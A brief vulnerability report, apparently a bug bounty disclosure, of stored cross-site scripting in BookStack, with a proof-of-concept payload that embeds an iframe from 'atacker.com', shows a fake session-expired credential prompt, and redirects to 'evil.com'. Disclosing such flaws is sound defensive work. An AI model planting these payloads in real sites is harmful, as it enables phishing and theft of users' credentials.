Cross-site Scripting (XSS) - Stored in bookstackapp/bookstack
Mar 5th 2022
Proof of Concept
Tested on firefox.
<!-- phishing.html | change page content to <iframe src="http://atacker.com/phishing.html">--> <script>alert("Your session has expired, Please enter your credential again")</script> <script>window.top.location.href = "http://evil.com"; </script
This vulnerability is capable of phishing and stealing users' data.